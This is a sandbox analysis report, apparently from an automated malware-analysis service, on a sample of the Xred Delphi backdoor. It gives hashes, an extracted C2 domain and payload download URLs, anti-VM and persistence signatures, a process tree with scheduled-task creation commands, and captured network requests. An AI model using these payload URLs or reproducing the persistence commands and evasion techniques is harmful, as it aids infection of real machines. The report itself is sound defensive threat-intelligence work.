Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/11/2024, 01:13 UTC

General

  • Target

    805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe

  • Size

    3.3MB

  • MD5

    e3a3e6d5bcdf3fe8c6c525429e401b1f

  • SHA1

    a1b2370bd81715b63dd6268e301a7101d39d3ebc

  • SHA256

    805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299

  • SHA512

    be86d4785df2de0b0f4e74c9f56988d7df0dc6ed2bd2d2632b83266a73ed72491b50a3db557d83ce5cca65ed1b98c97d6c63a90045188896b02d2fa3484e8743

  • SSDEEP

    98304:dnsmtk2a9XzhW148Pd+Tf1mpcOldJQ3/VL4:BL6FK4s0TfLOdo/K

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 13 IoCs
  • Themida packer 26 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe
    "C:\Users\Admin\AppData\Local\Temp\805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_805c795be5f0324f0e1d2bca61beabaf1d1d054eca2ad0224588295bb9d41299.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      PID:3000
    • C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
        "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2692
        • \??\c:\users\admin\appdata\local\temp\._cache_synaptics.exe 
          c:\users\admin\appdata\local\temp\._cache_synaptics.exe  InjUpdate
          4⤵
          • Executes dropped EXE
          PID:2320
        • C:\Windows\Resources\Themes\icsys.icn.exe
          C:\Windows\Resources\Themes\icsys.icn.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks whether UAC is enabled
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2628
          • \??\c:\windows\resources\themes\explorer.exe
            c:\windows\resources\themes\explorer.exe
            5⤵
            • Modifies visiblity of hidden/system files in Explorer
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1388
            • \??\c:\windows\resources\spoolsv.exe
              c:\windows\resources\spoolsv.exe SE
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1648
              • \??\c:\windows\resources\svchost.exe
                c:\windows\resources\svchost.exe
                7⤵
                • Modifies visiblity of hidden/system files in Explorer
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Checks whether UAC is enabled
                • Drops file in System32 directory
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1188
                • \??\c:\windows\resources\spoolsv.exe
                  c:\windows\resources\spoolsv.exe PR
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2268
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:15 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1832
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:16 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:888
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 01:17 /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1580
            • C:\Windows\Explorer.exe
              C:\Windows\Explorer.exe
              6⤵
                PID:536
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2600

    Network

    • flag-us
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-us
      DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • flag-us
      GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Wed, 27 Nov 2024 01:13:58 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • flag-us
      DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      142.250.187.206
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-kRfI6R5rNWHOaFsU_-UVkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-qkF4u-n4J92zeZ7tikG7vQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.187.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:53 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: script-src 'report-sample' 'nonce-F6AKXPnDYcHmb7BKqdsing' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      c.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.3
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /r/r1.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: c.pki.goog
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 854
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Wed, 27 Nov 2024 00:50:22 GMT
      Expires: Wed, 27 Nov 2024 01:40:22 GMT
      Cache-Control: public, max-age=3000
      Age: 1469
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Content-Type: application/pkix-crl
      Vary: Accept-Encoding
    • flag-us
      DNS
      o.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      o.pki.goog
      IN A
      Response
      o.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.200.3
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEEGoFYJ0C3qQCbRh5xcgwPQ%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 471
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Wed, 27 Nov 2024 01:11:49 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 182
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH
      Synaptics.exe
      Remote address:
      142.250.200.3:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDHA1yyGqTiRQmAB36tPEBH HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Wed, 27 Nov 2024 00:34:01 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 2451
    • flag-us
      DNS
      drive.usercontent.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      drive.usercontent.google.com
      IN A
      Response
      drive.usercontent.google.com
      IN A
      142.250.179.225
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Connection: Keep-Alive
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Security-Policy: script-src 'report-sample' 'nonce-2FLHKmB57GkpiHpwLO9v5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC7b28XIzOqUeyNtiimLtgQGONUMafXlXVgJi1CpG5H3J7X7RaVJVjxrKvCLAzhFRkTOHCVQO6nCaQ
      Server: UploadServer
      Set-Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw; expires=Thu, 29-May-2025 01:14:52 GMT; path=/; domain=.google.com; HttpOnly
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: drive.usercontent.google.com
      Cache-Control: no-cache
      Connection: Keep-Alive
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:52 GMT
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-6gB_jJxJFIFm1a4EKFiujA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC6hlrvb0nWEJCLjaypQJ2H9ytuVeaP1p2_0bVBWj6lV4wTLFo9G8swGYYtQmzR4v_lGs2qgWyNf7A
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      142.250.179.225:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: drive.usercontent.google.com
      Cache-Control: no-cache
      Connection: Keep-Alive
      Cookie: NID=519=GbCRHQhIQMugPiuYiAH_9Z--nlBqk-zXUZILISZG-1RBaNnCrI1XKZ-kl3_TD1PD7p9AsjqAEOoXuaYaPDBvvwE-VxbbKjB-XWv9toe78l0S0sAxitXJigSGul9bwJHFWSkxJ-11LP5HugEjjA2p0l07LXC5Q2beH3RZGt7G-Ql3nYw
      Response
      HTTP/1.1 404 Not Found
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Wed, 27 Nov 2024 01:14:53 GMT
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-fPXZ79WXvdhXQdwBotrhvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Length: 1652
      X-GUploader-UploadID: AFiumC63ouSAW91nL_sUJ6iQPJQBSeb6HIKjj_yfEXQOE0oETF-sgnmlogP5R6xK4_iE6r-CN-s6_kapMg
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-us
      DNS
      crl.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      crl.microsoft.com
      IN A
      Response
      crl.microsoft.com
      IN CNAME
      crl.www.ms.akadns.net
      crl.www.ms.akadns.net
      IN CNAME
      a1363.dscg.akamai.net
      a1363.dscg.akamai.net
      IN A
      88.221.134.83
      a1363.dscg.akamai.net
      IN A
      88.221.134.146
    • flag-gb
      GET
      http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
      Remote address:
      88.221.134.83:80
      Request
      GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: crl.microsoft.com
      Response
      HTTP/1.1 200 OK
      Content-Length: 1036
      Content-Type: application/octet-stream
      Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
      Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
      ETag: 0x8DCDDD1E3AF2C76
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 37b0a847-001e-003a-4dc7-0f4d92000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Wed, 27 Nov 2024 01:15:22 GMT
      Connection: keep-alive
    • flag-us
      DNS
      www.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      95.100.245.144
    • flag-gb
      GET
      http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
      Remote address:
      95.100.245.144:80
      Request
      GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
      User-Agent: Microsoft-CryptoAPI/6.1
      Host: www.microsoft.com
